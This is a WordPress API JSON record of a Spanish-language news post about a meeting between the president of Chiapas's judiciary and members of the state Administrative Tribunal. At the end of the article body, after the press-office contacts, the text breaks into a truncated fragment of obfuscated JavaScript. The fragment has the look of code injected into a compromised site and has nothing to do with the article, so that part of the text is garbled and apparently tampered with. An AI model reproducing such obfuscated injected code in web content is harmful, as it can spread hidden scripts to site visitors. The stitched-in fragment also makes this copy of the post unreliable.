{"id":4328,"date":"2022-08-12T01:23:59","date_gmt":"2022-08-12T01:23:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4328"},"modified":"2022-08-12T01:24:01","modified_gmt":"2022-08-12T01:24:01","slug":"se-reune-presidente-del-poder-judicial-con-integrantes-del-tribunal-administrativo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4328","title":{"rendered":"Se re\u00fane presidente del Poder Judicial con integrantes del Tribunal Administrativo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-7.02.49-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-4329\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-7.02.49-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-7.02.49-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-7.02.49-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-7.02.49-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/WhatsApp-Image-2022-08-11-at-7.02.49-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>11  de Agosto del 2022. El presidente del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, acompa\u00f1ado de las consejeras de la Judicatura Isela Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa, se reuni\u00f3 con la magistrada presidenta del Tribunal Administrativo del Poder Judicial, Susana Sarmiento L\u00f3pez; adem\u00e1s de las y los magistrados del mismo \u00f3rgano, M\u00f3nica de Jes\u00fas Trejo Vel\u00e1zquez y V\u00edctor Marcelo Ruiz Reyna, as\u00ed como con el juez Elmar Mario Guirao Maldonado, juez especializado en Responsabilidad Administrativa.<\/p>\n\n\n\n<p>Es de mencionar que, desde la Reforma Constitucional del a\u00f1o 2019, el Tribunal Administrativo, como un \u00f3rgano integrante del Poder Judicial del Estado de Chiapas, destaca por su funcionalidad en la aplicaci\u00f3n de la justicia administrativa en la entidad.<\/p>\n\n\n\n<p>De esta manera, con la intenci\u00f3n de fortalecer el trabajo coordinado, el presidente del Poder Judicial Guillermo Ramos P\u00e9rez, salud\u00f3 a las y los integrantes del Tribunal Administrativo del Poder Judicial, integrado por una Sala en Revisi\u00f3n y Juzgados Especializados en Responsabilidad Administrativa y de Jurisdicci\u00f3n Administrativa, con quienes dijo los une el inter\u00e9s por un mejor Chiapas.<\/p>\n\n\n\n<p>En tanto, la magistrada Susana Sarmiento L\u00f3pez salud\u00f3 al presidente del Poder Judicial y ratific\u00f3 el compromiso institucional para continuar trabajando para garantizar de manera coordinada la impartici\u00f3n de justicia en Chiapas.<\/p>\n\n\n\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social&nbsp;<\/p>\n\n\n\n<p>y Relaciones P\u00fablicas<\/p>\n\n\n\n<p>61 7 87 00 Ext. 8020\/8021&nbsp;f&nbsp;<\/p>\n\n\n\n<p>: \/poderjudicial.chiapas&nbsp;t&nbsp;<\/p>\n\n\n\n<p>: @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>11 de Agosto del 2022. El presidente del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, acompa\u00f1ado de las consejeras de la Judicatura Isela Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa, se reuni\u00f3 con la magistrada presidenta del Tribunal Administrativo del Poder Judicial, Susana Sarmiento L\u00f3pez; adem\u00e1s de las y los magistrados del mismo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4329,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4328","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4328","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4328"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4328\/revisions"}],"predecessor-version":[{"id":4330,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4328\/revisions\/4330"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4329"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4328"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4328"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4328"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}